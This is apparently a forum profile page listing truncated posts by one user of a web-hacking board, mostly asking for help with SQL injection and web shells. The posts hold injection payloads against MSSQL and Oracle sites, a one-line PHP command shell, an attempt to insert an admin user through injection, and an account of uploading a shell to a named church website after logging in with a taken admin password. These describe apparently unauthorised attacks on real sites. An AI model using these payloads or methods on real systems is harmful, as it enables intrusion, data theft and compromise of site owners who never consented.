Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 78
1 year ago
netpumber
Hi. I found this vuln and i m trying to exploit it two days now. It a little curious how it seems that it works. with a single quote : .asp?id=8' RETURNED : Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark after the character string ''. But if you try to use group by or something like or 1=1 / and 1=1 .asp?id=8 having 1=1-- .asp?id=8 or 1=
Forum: SQL and Code Injection
4 years ago
netpumber
Thanks but i haven't phpbb3..
Forum: SQL and Code Injection
4 years ago
netpumber
Hi! I take the pass from a phpbb forum (Powered by phpBB © 2001, 2002 phpBB Group) and i can login as admin.. Does anyone knows a way to upload a php shell either c99 or just a simple php command like <?php system(GET['cmd']) ?> ? I found in internet some articles that talks about changing something in Css styles but these referred in phpbb3.. Whats your opinion ? Thanks i
Forum: SQL and Code Injection
4 years ago
netpumber
dudes.. OMG you are crazy...
Forum: SQL and Code Injection
4 years ago
netpumber
dude.. I have already found table from information schema.. but i want to add a user in users table ...
Forum: SQL and Code Injection
4 years ago
netpumber
here is the error : Warning: mysql_fetch_array(): ... Warning: mysql_free_result(): ... Warning: mysql_num_rows(): ... Warning: mysql_free_result(): ...
Forum: SQL and Code Injection
4 years ago
netpumber
how you include this files ? With load_file() method ?
Forum: SQL and Code Injection
4 years ago
netpumber
yes but this returns all schemata.. I want to know the schema of user table ...
Forum: SQL and Code Injection
4 years ago
netpumber
Hallon again.. I have found a vuln site... in sql inj i want to add a user in users table..and i type this but it returns me an error =null INSERT INTO users (user_name,user_password) VALUES (test,test)-- I have to change something ? What you say? Thanks!
Forum: SQL and Code Injection
4 years ago
netpumber
Hi guyz is there a way to find the schema_name from a specific table_name ? Thanks a lot..
Forum: SQL and Code Injection
4 years ago
netpumber
About where statment ' or 1=utl_inaddr.get_host_address((SELECT top 1 table_name FROM all_tables where table_name not in ('1st table_name','2nd table_name',...)))-- Now about error with FROM i can't imagine something.. Maybe if you try ?id=-1 and 1 in (select top 1 table_name FROM all_tables)-- ??
Forum: SQL and Code Injection
4 years ago
netpumber
First try to find as usual column numbers with order by =1 order by 1-- then union select 1,2,3,4 FROM all_tables-- If a number appear you know what to do... e.g union select 1,table_name,2,3,4 FROM all_tables-- BUT if no number return and an error occurs , then replace all numbers with null like here : union select null,null,null,null FROM all_tables-- and change each time
Forum: SQL and Code Injection
4 years ago
netpumber
hcoder what you mean ? You need help on oracle error based sql injection ?
Forum: SQL and Code Injection
4 years ago
netpumber
This is what i found on google about this error ORA-00904: string: invalid identifier Cause: The column name entered is either missing or invalid. Action: Enter a valid column name. A valid column name must begin with a letter, be less than or equal to 30 characters, and consist of only alphanumeric characters and the special characters $, _, and #. If it contains other characters, then i
Forum: SQL and Code Injection
4 years ago
netpumber
I test some more queries page.php?nm=) having 1=1-- Error: ORA-00907: missing right parenthesis I add one more parenthesis =)) having 1=1-- Error: ORA-00933: SQL command not properly ended Also =) union select * from dual-- Error: ORA-00904: "R": invalid identifier its the same and if i will change the table name =) union select * from users-- Error: ORA-0
Forum: SQL and Code Injection
4 years ago
netpumber
Hmm thanks for your answer first of all so something happens now... with =as) 1 order by 1-- returns Error: ORA-00907: missing right parenthesis BUT with =as) union select null,null from dual-- returns Error: ORA-00904: "R": invalid identifier What this R means ?
Forum: SQL and Code Injection
4 years ago
netpumber
Halo out there! Im pentesting a a web page..with Oracle database.. So i found a possible SQL Injection Here it is : Input : page.php?nm=AS' Error : ORA-01756: quoted string not properly terminated Think : Hmmm nice...:) Possible Query : SELECT * FROM table WHERE nm='AS So if i add one more single quote Input : page.php?nm=AS'' Error : ORA-00907: missing right parenthesis Ho
Forum: SQL and Code Injection
4 years ago
netpumber
Doesn't support asp this server.. :s There is no way to bypass this restriction ? As i understand i have to change the chmod of the uploaded file to be run.. But i can't think something .. :p
Forum: SQL and Code Injection
4 years ago
netpumber
Maybe if i give an other extension in my file...but what ? .phtml didnt worked.
Forum: SQL and Code Injection
4 years ago
netpumber
Hi!! I have found a remote file upload vulnerability in one site . I upload a php shell and when i m going to run it returns me Internal Server Error Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, webmaster@ilion-church.gr and inform them of the time the error occurre
Forum: SQL and Code Injection
4 years ago
netpumber
stuckinphp you mean something like this ? MONTHS=12--or 1 in (select top 1 table_name from information_schema.tables)
Forum: SQL and Code Injection
4 years ago
netpumber
@ Matt Presson with MONTHS=12 having 1=1-- returns this : Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '12 having 1=1--' to a column of data type int. /pressroom.asp, line 308 @ Reiners with MONTHS=12) having 1=1-- Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '
Forum: SQL and Code Injection
4 years ago
netpumber
Hi dudes! I have found a very strange sqli . I don't know if it is exploitable but you can tell me your opinion.. So here is the story.. Vuln Variable : MONTHS=12' Error: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '12') ORDER BY date DESC;'. /pressroom.asp, line 308 So i think.. i have to close the unc
Forum: SQL and Code Injection
4 years ago
netpumber
My friend thrill i didnt see nowhere an error like mine in these links you post. The problem is that i cant execute a select command because of this failed conversion. Have you any idea on how to make server run my commands? Also and in order by command returns me this error :s Microsoft OLE DB Provider for ODBC Drivers error '80040e07' Conversion failed when converting the varchar valu
Forum: SQL and Code Injection
4 years ago
netpumber
hi! i found a mssql injection that gives back this error. Microsoft OLE DB Provider for ODBC Drivers error '80040e14' Unclosed quotation mark after the character string '1''. /FRONTOFFICE/includes/core/inc_basicRoutines.asp, line 236 and when im try to get table_name with -1 or 1 in (select top 1 table_name from information_schema.tables)-- returns me this error : Mi
Forum: SQL and Code Injection
4 years ago
netpumber
yeah.. i type lspci and its there ..Also i search in google and saw that its drivers is madwifi. And now im trying to understand on how to install them :)
Forum: Wireless Security
4 years ago
netpumber
As i remember this one works with madwifi driver. But i think that this driver is installed in my system...
Forum: Wireless Security
4 years ago
netpumber
hmm it doesnt show the card...:s
Forum: Wireless Security
4 years ago
netpumber
To see a device in ifconfig in my laptop you have to type first ifconfig device up and then if you type ifconfig you will see it. But i dont know the name of the device of dlink wireless card..to make it up.
Forum: Wireless Security
4 years ago
netpumber
I have the backtrack 4 as OS. And as i remember few years ago this card worked with backtrack older versions. But i don't remember how :p
Forum: Wireless Security
Pages: 123Next
Current Page: 1 of 3